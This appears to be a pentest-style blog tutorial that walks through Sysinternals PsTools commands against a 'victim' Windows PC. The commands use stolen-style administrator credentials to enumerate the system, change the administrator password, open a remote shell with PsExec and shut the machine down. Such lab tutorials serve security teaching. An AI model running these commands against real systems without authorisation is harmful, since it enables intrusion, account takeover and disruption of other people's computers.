• Home
  • /
  • Remote Windows PC Enumeration with PSTools

Remote Windows PC Enumeration with PSTools

Remote Windows PC Enumeration with PSTools

PsTools, developed by the renowned Mark Russinovich, is a comprehensive collection of 13 exceptional tools designed to revolutionize remote Windows PC enumeration. These command line-based tools provide an unparalleled level of control and flexibility, enabling users to execute application and process commands effortlessly on remote devices. What sets PsTools apart is its unique capability to redirect the output of console applications to the local system, seamlessly integrating remote functionality as if it were running locally.

PsTools is compatible with a wide range of Windows operating systems, supporting versions later than NT windows. Whether you’re working on your local computer or accessing remote hosts, PsTools offers seamless functionality without the need for manual software installation on the remote system. Additionally, it provides the flexibility to specify alternative credentials, ensuring secure access to remote systems while maintaining complete control.

The standout feature of PsTools lies in its cohesive suite of tools, all prefixed with the “Ps” keyword. This naming convention pays homage to the widely recognized UNIX process listing command line tool named “ps.” By adopting this prefix for all the tools, PsTools consolidates them into a powerful and unified suite, streamlining your workflow and enhancing efficiency.

With PsTools at your disposal, you can delve into the depths of remote Windows PC enumeration like never before. Whether you need to gather system information, monitor processes, or execute commands on remote devices, PsTools offers an extensive range of capabilities to meet your specific needs. Experience the unmatched power and versatility of PsTools today and unlock a new level of control over your remote Windows PC enumeration tasks.

Remote Windows PC Enumeration with PsTools

Download PSTool Kit from  https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

PSTools contain following tools in a single kit:

  • PsExec – used to execute processes remotely
  • PsFile – to show files opened remotely
  • PsGetSid – displays the SID of a computer or a user
  • PsInfo – lists information about a system
  • PsPing – measures network performance
  • PsKill – kills processes by name or process ID
  • PsList – lists detailed information about processes
  • PsLoggedOn – see who’s logged on locally and via resource sharing (full source is included)
  • PsLogList – dumps event log records
  • PsPasswd – changes account passwords
  • PsService – view and control services
  • PsShutdown – shuts down and optionally reboots a computer
  • PsSuspend – suspends processes

Lets move on how to use PsTools through command prompt.

Firstly, open up PSTool Kit and to do so open your command prompt and open PSTool kit using cd command.

Note:  If you see such dialogue box as shown below, then always click on AGREE to run or else the above commands will not work.

Remote Windows PC Enumeration with PsTools

Get SID

  • Once you run PSTool kit, run dir command so that you can see the list of all tools.
  • Now, we run a command that will help us use PSGetsid tool in the Tool Kit. The command is:

          PSGetsidc64.exe \\192.168.1.104 -u administrator -p Ignite@123

  • Here,

192.168.1.104 –> our victim’s IP

-u –> denotes username

Administrator –> username

-p –> denotes password

Ignite@123 –> password

System Information

  • Will use these commands to execute system information of remote PC.
  • Next, we’ll learn about psinfo.exe tool which gives us all the necessary information of the remote PC. To make this tool work type:

psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123

Share Folder

This will share folder of remote PC.

  • Moving forward, we will now make psfile tool work by typing the following command:

psfile64.exe \\192.168.1.104  -u administrator -p Ignite@123

Process Inforatmion

This command execution will help to see every single file and directories that are remotely open on the PC of victim.

  • We will see this pslist tool and to make it work using the command below:

pslist64.exe \\192.168.1.104 -u administrator -p Ignite@123

Services

Psservice.exe which lets us know all the running services on our victims’ PC. The command is:

PsService64.exe \\192.168.1.104 -u administrator -p Ignite@123

Log List

This Psloglist.exe tool helps us to see the logs of victim PC. To do so, run the following command.

psloglist.exe \\192.168.1.104 -u administrator -p Ignite@123

Change Password

Pspasswd64.exe is the most important tool as it lets us to change the password of a PC. To do, use the command:

pspasswd64.exe \\192.168.1.104 -u administrator -p ignite@123 administrator forever

Here,

192.168.1.104 –> our victim’s IP

-u –> denotes username

Administrator –> username

-p –> denotes password

Ignite@123 –> password

Administrator –-> username (specify a user to change)

Remote Connect Shell

PsExec64.exe is another important tool which takes us directly in the shell of victim’s PC. Its command is:

PsExec64.exe \\192.168.1.104 -u administrator -p forever cmd

Shutdown

At last, this Psshutdown tool helps us to shutdown remote PC. Just type:

psshutdown.exe \\192.168.1.104 -u administrator -p forever

It will take 20 seconds to shutdown the PC after you execute the command.

So, these were tools in the PSTool kit and the commands to run them. These tools really make our work a lot easy and come in handy. That’s all Remote Windows PC Enumeration with PSTools.

About the author 

HACKABEAST

January 14, 2024

July 23, 2023

July 23, 2023

Leave a Reply

Your email address will not be published. Required fields are marked

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}
Share via
Copy link